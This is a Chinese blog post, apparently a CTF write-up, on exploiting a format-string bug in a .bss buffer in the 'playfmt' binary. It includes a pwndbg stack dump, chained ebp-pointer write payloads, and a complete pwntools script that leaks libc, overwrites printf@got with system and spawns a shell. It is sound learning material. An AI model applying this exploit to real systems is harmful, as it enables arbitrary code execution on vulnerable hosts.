<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="fmt_bss源码如下 1234567891011121314int do_fmt()&amp;#123;  int result; &#x2F;&#x2F; eax  while ( 1 )  &amp;#123;    read(0, buf, 0xC8u);    result &#x3D; strncmp(buf, &quot;quit&quot;, 4u);    if ( !result )      break;    prin">
<meta property="og:type" content="article">
<meta property="og:title" content="fmt_bss">
<meta property="og:url" content="http://example.com/2021/11/05/fmt-bss/index.html">
<meta property="og:site_name" content="study">
<meta property="og:description" content="fmt_bss源码如下 1234567891011121314int do_fmt()&amp;#123;  int result; &#x2F;&#x2F; eax  while ( 1 )  &amp;#123;    read(0, buf, 0xC8u);    result &#x3D; strncmp(buf, &quot;quit&quot;, 4u);    if ( !result )      break;    prin">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2021-11-05T11:57:55.000Z">
<meta property="article:modified_time" content="2021-11-05T11:58:24.940Z">
<meta property="article:author" content="rootzhang">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2021/11/05/fmt-bss/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>fmt_bss | study</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">study</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/11/05/fmt-bss/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="rootzhang">
      <meta itemprop="description" content="我的博客">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="study">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          fmt_bss
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-11-05 19:57:55 / 修改时间：19:58:24" itemprop="dateCreated datePublished" datetime="2021-11-05T19:57:55+08:00">2021-11-05</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="fmt-bss"><a href="#fmt-bss" class="headerlink" title="fmt_bss"></a>fmt_bss</h2><p>源码如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">do_fmt</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> result; <span class="comment">// eax</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    read(<span class="number">0</span>, buf, <span class="number">0xC8</span>u);</span><br><span class="line">    result = <span class="built_in">strncmp</span>(buf, <span class="string">&quot;quit&quot;</span>, <span class="number">4u</span>);</span><br><span class="line">    <span class="keyword">if</span> ( !result )</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="built_in">printf</span>(buf);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可见是格式化字符串漏洞，但是别的题不一样的是我们接收字符的变量buf在bss段，也就是说我们写入的字符不在栈中，而在bss段，以往的做题套路就是把地址包含在字符串中输入，然后索引到这个地址，就可以改变这个地址对应内存的内容了，但是如果在bss段，把地址包含在字符串中输入的话，就无法定位到这个地址到参数的偏移量了，所以不能简单利用这个套路，看了两三篇博客后，逐渐搞懂了该怎么格式化字符串了。</p>
<p>格式化字符串的本质是$n这个特殊字符，一般构造是%c%k$n，k是偏移量，执行这个格式化字符串的结果就是在偏移量k处把输出的字符的个数填入，如果这个地方还储存这一个地址，他就把个数填入这个地址对应的内存中，就达成了数据覆盖。所以思路就是我们把想要覆盖数据的地址填入格式化字符串可以索引到的位置（叫做位置一），然后执行格式化字符串，索引到位置一，然后以位置一为跳板修改对应地址的值</p>
<p>这道题就是这个构造式的转化，shift+f12发现没有特殊函数和字符，也没法直接读取flag，也没有特殊函数可以把bss段变得可以执行，加上这个程序还有格式化漏洞，所以思路就是读取一个函数的真实地址，得到libc的基地址，然后得到system函数地址，利用格式化字符串的任意读写把system函数填入printf的got中，然后输入/bin/sh\x00执行system(‘/bin/sh\x00’)</p>
<p>这里我们选择读取prinf的真实地址，然后覆盖他的地址为system的地址，但是该如何完成呢，fmt_bss主要依靠两个ebp来完成</p>
<p>查看一下程序第一次执行printf函数时栈的内容</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">00:0000│ esp 0xffffcfc0 —▸ 0x804a060 (buf) ◂— jae    0x804a0c6 /* 0x73666473; &#x27;sdfsd\n&#x27; */</span><br><span class="line">01:0004│     0xffffcfc4 —▸ 0x8048680 ◂— jno    0x80486f7 /* &#x27;quit&#x27; */</span><br><span class="line">02:0008│     0xffffcfc8 ◂— 0x4</span><br><span class="line">03:000c│     0xffffcfcc —▸ 0x8048507 (do_fmt+12) ◂— add    ebx, 0x1af9</span><br><span class="line">04:0010│     0xffffcfd0 —▸ 0x8048685 ◂— cmp    eax, 0x3d3d3d3d /* &#x27;=====================&#x27; */</span><br><span class="line">05:0014│     0xffffcfd4 —▸ 0x804a000 (_GLOBAL_OFFSET_TABLE_) —▸ 0x8049f10 (_DYNAMIC) ◂— add    dword ptr [eax], eax</span><br><span class="line">06:0018│ ebp 0xffffcfd8 —▸ 0xffffcfe8 —▸ 0xffffcff8 ◂— 0x0</span><br><span class="line">07:001c│     0xffffcfdc —▸ 0x80485ad (play+77) ◂— nop    </span><br><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> </span></span><br><span class="line">08:0020│  0xffffcfe0 —▸ 0xf7fb5d60 (_IO_2_1_stdout_) ◂— xchg   dword ptr [eax], ebp /* 0xfbad2887 */</span><br><span class="line">09:0024│  0xffffcfe4 —▸ 0x804a000 (_GLOBAL_OFFSET_TABLE_) —▸ 0x8049f10 (_DYNAMIC) ◂— add    dword ptr [eax], eax</span><br><span class="line">0a:0028│  0xffffcfe8 —▸ 0xffffcff8 ◂— 0x0</span><br><span class="line">0b:002c│  0xffffcfec —▸ 0x80485ea (main+55) ◂— nop    </span><br><span class="line">0c:0030│  0xffffcff0 —▸ 0xffffd010 ◂— 0x1</span><br><span class="line">0d:0034│  0xffffcff4 ◂— 0x0</span><br><span class="line">0e:0038│  0xffffcff8 ◂— 0x0</span><br><span class="line">0f:003c│  0xffffcffc —▸ 0xf7e1a647 (__libc_start_main+247) ◂— add    esp, 0x10</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>发现ebp处储存着下一个ebp的地址，我们把第一个ebp叫做ebp1，第二个ebp叫做ebp2,ebp下面的内存这种储存着一个地址，这个位置离参数的偏移为7，就叫做fmt7，ebp2的下一个内存中也储存这一个地址，相对于参数的偏移为11，就叫做fmt11</p>
<p>我们要得到printf的真实地址，就得先选择一个跳板来储存print@got的值，我们先查看一下printf@got的地址</p>
<p><code>0x804a010</code>这是printfgot表的地址，得到地址就要写入栈中，现在得思考挑选哪个内存当跳板，对比栈上的内容发现，fmt7和fmt11储存的地址的前四个字节和printf的地址是一样的，只有后两个自己不一样，我们就可以选择他俩储存储存printfgot表地址，因为我们只要修改最后两个字节就可以了，我们暂时选择fmt7储存地址，fmt11后面有用。</p>
<p>但是无法直接修改fmt7上的值因为fmt7上原本也储存着地址，直接%c%7%n的话，就修改了fmt7上储存的地址对应的内存的数据了，而不是fmt7本身，无法直接就该得选择通过跳板来就该，即选择一个跳板储存fmt7的地址，通过这个跳板来修改fmt7的值，我们选择通过ebp1和ebp2联合配合来解决这个问题，ebp2本来储存的地址和fmt7的地址就最后一个字节不一样，我们可以把ebp2当做跳板来修改fmt7的值，但是同样的原因无法直接修改ebp2的内容，而ebp1储存着ebp2的地址我们可以通过ebp1为跳板修改ebp2的值。</p>
<p>脚本如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">sh=process(<span class="string">&#x27;./playfmt&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./playfmt&#x27;</span>)</span><br><span class="line"><span class="comment">#gdb.attach(sh,&quot;b *0x0804854F&quot;)</span></span><br><span class="line">libc=elf.libc</span><br><span class="line">print_got=elf.got[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">system_offset=libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">printf_offset=libc.symbols[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(<span class="string">&#x27;%6$x&#x27;</span>)</span><br><span class="line">ebp2=<span class="built_in">int</span>(sh.recv(),<span class="number">16</span>)</span><br><span class="line">fmt7=ebp2-<span class="number">0xc</span></span><br><span class="line">ebp1=fmt7-<span class="number">0x4</span></span><br><span class="line">fmt11=ebp2+<span class="number">0x4</span></span><br><span class="line"><span class="comment">#ebp2---fmt7</span></span><br><span class="line">pay1=<span class="string">&#x27;%&#x27;</span>+<span class="built_in">str</span>(fmt7&amp;<span class="number">0xffff</span>)+<span class="string">&#x27;c%6$hn&#x27;</span></span><br><span class="line">sleep(<span class="number">0.3</span>)</span><br><span class="line">sh.sendline(pay1)</span><br></pre></td></tr></table></figure>

<p>这时ebp2就指向了fmt7，然后以ebp2为跳板修改fmt7的值</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#fmt7---printf@got</span></span><br><span class="line">pay2=<span class="string">&#x27;%&#x27;</span>+<span class="built_in">str</span>(print_got&amp;<span class="number">0xffff</span>)+<span class="string">&#x27;c%10$hn&#x27;</span></span><br><span class="line">sleep(<span class="number">0.4</span>)</span><br><span class="line">sh.sendline(pay2)</span><br></pre></td></tr></table></figure>



<p>这时fmt7就指向了printf@got，就可以读取printf的真实地址了，但是我们不着急读，我们能推出system的地址了，然后得把system的地址写到printf@got中，地址一共四个字节，$n能直接写四个字节，但是程序会崩溃，不建议这样，一般选择$hn，两个字节两个字节写，拿fmt7当跳板覆盖地址的话，只能覆盖后两个字节，无法一次性全部覆盖，所以后两个字节也得要一个跳板来指向他，fmt11就派上用场了，把fm11储存的地址改成print$@got+2，联合fmt7和fmt11就可以一次性完成修改了。和修改fmt7的内容一样，fmt11也t通过ebp1和ebp2修改,即通过ebp1修改ebp2指向fmt11,再通过fmt11修改got</p>
<p>ebp2指向fmt11</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">pay3=<span class="string">&#x27;%&#x27;</span>+<span class="built_in">str</span>(fmt11&amp;<span class="number">0xffff</span>)+<span class="string">&#x27;c%6$hn&#x27;</span></span><br><span class="line">sleep(<span class="number">0.3</span>)</span><br><span class="line">sh.sendline(pay3)</span><br></pre></td></tr></table></figure>

<p>然后把fmt11指向got+2</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">pay4=<span class="string">&#x27;%&#x27;</span>+<span class="built_in">str</span>((print_got+<span class="number">2</span>)&amp;<span class="number">0xffff</span>)+<span class="string">&#x27;c%10$hn&#x27;</span></span><br><span class="line">sleep(<span class="number">0.4</span>)</span><br><span class="line">sh.sendline(pay4)</span><br></pre></td></tr></table></figure>

<p>然后读printf的真实地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#print_addr</span></span><br><span class="line">sh.sendline(<span class="string">&#x27;aaa1%7$s&#x27;</span>)</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;a1&#x27;</span>)</span><br><span class="line">print_addr=u32(sh.recv(<span class="number">4</span>))</span><br><span class="line"><span class="comment">#system_addr</span></span><br><span class="line">system_addr=print_addr-printf_offset+system_offset</span><br><span class="line">log.info(<span class="string">&#x27;************&#123;:#x&#125;***********&#x27;</span>.<span class="built_in">format</span>(system_addr))</span><br></pre></td></tr></table></figure>

<p>最后修改地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">system_low=system_addr&amp;<span class="number">0xffff</span></span><br><span class="line">system_high=system_addr&gt;&gt;<span class="number">16</span></span><br><span class="line">pay5=<span class="string">&#x27;%&#x27;</span>+<span class="built_in">str</span>(system_low)+<span class="string">&#x27;c%7$hn&#x27;</span>+<span class="string">&#x27;%&#x27;</span>+<span class="built_in">str</span>(system_high-system_low)+<span class="string">&#x27;c%11$hn&#x27;</span></span><br><span class="line">sleep(<span class="number">0.3</span>)</span><br><span class="line">sh.sendline(pay5)</span><br></pre></td></tr></table></figure>

<p>完整payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">sh=process(<span class="string">&#x27;./playfmt&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./playfmt&#x27;</span>)</span><br><span class="line"><span class="comment">#gdb.attach(sh,&quot;b *0x0804854F&quot;)</span></span><br><span class="line">libc=elf.libc</span><br><span class="line">print_got=elf.got[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">system_offset=libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">printf_offset=libc.symbols[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(<span class="string">&#x27;%6$x&#x27;</span>)</span><br><span class="line">ebp2=<span class="built_in">int</span>(sh.recv(),<span class="number">16</span>)</span><br><span class="line">fmt7=ebp2-<span class="number">0xc</span></span><br><span class="line">ebp1=fmt7-<span class="number">0x4</span></span><br><span class="line">fmt11=ebp2+<span class="number">0x4</span></span><br><span class="line"><span class="comment">#ebp2---fmt7</span></span><br><span class="line">pay1=<span class="string">&#x27;%&#x27;</span>+<span class="built_in">str</span>(fmt7&amp;<span class="number">0xffff</span>)+<span class="string">&#x27;c%6$hn&#x27;</span></span><br><span class="line">sleep(<span class="number">0.3</span>)</span><br><span class="line">sh.sendline(pay1)</span><br><span class="line"><span class="comment">#标志符</span></span><br><span class="line"><span class="keyword">while</span>(<span class="number">1</span>):</span><br><span class="line">    sleep(<span class="number">0.3</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;abc\x00&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> sh.recv().find(<span class="string">&#x27;abc&#x27;</span>)!=-<span class="number">1</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line"><span class="comment">#fmt7---printf@got</span></span><br><span class="line">pay2=<span class="string">&#x27;%&#x27;</span>+<span class="built_in">str</span>(print_got&amp;<span class="number">0xffff</span>)+<span class="string">&#x27;c%10$hn&#x27;</span></span><br><span class="line">sleep(<span class="number">0.4</span>)</span><br><span class="line">sh.sendline(pay2)</span><br><span class="line"><span class="comment">#标志符</span></span><br><span class="line"><span class="keyword">while</span>(<span class="number">1</span>):</span><br><span class="line">    sleep(<span class="number">0.3</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;abc\x00&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> sh.recv().find(<span class="string">&#x27;abc&#x27;</span>)!=-<span class="number">1</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line"><span class="comment">#ebp2----fmt11</span></span><br><span class="line">pay3=<span class="string">&#x27;%&#x27;</span>+<span class="built_in">str</span>(fmt11&amp;<span class="number">0xffff</span>)+<span class="string">&#x27;c%6$hn&#x27;</span></span><br><span class="line">sleep(<span class="number">0.3</span>)</span><br><span class="line">sh.sendline(pay3)</span><br><span class="line"><span class="comment">#标志符</span></span><br><span class="line"><span class="keyword">while</span>(<span class="number">1</span>):</span><br><span class="line">    sleep(<span class="number">0.3</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;abc\x00&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> sh.recv().find(<span class="string">&#x27;abc&#x27;</span>)!=-<span class="number">1</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line"><span class="comment">#fmt11---got+2</span></span><br><span class="line">pay4=<span class="string">&#x27;%&#x27;</span>+<span class="built_in">str</span>((print_got+<span class="number">2</span>)&amp;<span class="number">0xffff</span>)+<span class="string">&#x27;c%10$hn&#x27;</span></span><br><span class="line">sleep(<span class="number">0.4</span>)</span><br><span class="line">sh.sendline(pay4)</span><br><span class="line"><span class="comment">#标志符</span></span><br><span class="line"><span class="keyword">while</span>(<span class="number">1</span>):</span><br><span class="line">    sleep(<span class="number">0.3</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;abc\x00&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> sh.recv().find(<span class="string">&#x27;abc&#x27;</span>)!=-<span class="number">1</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line"><span class="comment">#print_addr</span></span><br><span class="line">sh.sendline(<span class="string">&#x27;aaa1%7$s&#x27;</span>)</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;a1&#x27;</span>)</span><br><span class="line">print_addr=u32(sh.recv(<span class="number">4</span>))</span><br><span class="line"><span class="comment">#system_addr</span></span><br><span class="line">system_addr=print_addr-printf_offset+system_offset</span><br><span class="line">log.info(<span class="string">&#x27;************&#123;:#x&#125;***********&#x27;</span>.<span class="built_in">format</span>(system_addr))</span><br><span class="line"><span class="comment">#printgot---system</span></span><br><span class="line">system_low=system_addr&amp;<span class="number">0xffff</span></span><br><span class="line">system_high=system_addr&gt;&gt;<span class="number">16</span></span><br><span class="line">pay5=<span class="string">&#x27;%&#x27;</span>+<span class="built_in">str</span>(system_low)+<span class="string">&#x27;c%7$hn&#x27;</span>+<span class="string">&#x27;%&#x27;</span>+<span class="built_in">str</span>(system_high-system_low)+<span class="string">&#x27;c%11$hn&#x27;</span></span><br><span class="line">sleep(<span class="number">0.3</span>)</span><br><span class="line">sh.sendline(pay5)</span><br><span class="line"><span class="comment">#标志符</span></span><br><span class="line"><span class="keyword">while</span>(<span class="number">1</span>):</span><br><span class="line">    sleep(<span class="number">0.3</span>)</span><br><span class="line">    sh.sendline(<span class="string">&#x27;abc\x00&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> sh.recv().find(<span class="string">&#x27;abc&#x27;</span>)!=-<span class="number">1</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">sleep(<span class="number">0.3</span>)</span><br><span class="line">sh.sendline(<span class="string">&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<p>能打通本地,远程差不多，就不搞了。（懒</p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>由于没法直接在字符串包含地址，所以得构造类似地址链的东西，把他抽象出来感觉就像一个链表，每个位置就像一个节点，我们只有最后一个节点（不储存低位的位置）可以直接修改数据，其他节点（储存着后置节点的地址），得通过对应的前置节点才可以修改，如果要修改某个位置的值，可以通过各种办法把他连到这个链表上，就可以通过前置节点修改其值了，payload就相当于以ebp1为头结点构造链表了。</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/11/04/ret2dl/" rel="prev" title="ret2dl">
      <i class="fa fa-chevron-left"></i> ret2dl
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/11/06/%E6%A0%88%E6%9A%82%E6%97%B6%E5%B0%B1%E5%88%B0%E8%BF%99%E4%BA%86/" rel="next" title="栈暂时就到这了">
      栈暂时就到这了 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#fmt-bss"><span class="nav-number">1.</span> <span class="nav-text">fmt_bss</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">1.1.</span> <span class="nav-text">总结</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">rootzhang</p>
  <div class="site-description" itemprop="description">我的博客</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">8</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">rootzhang</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
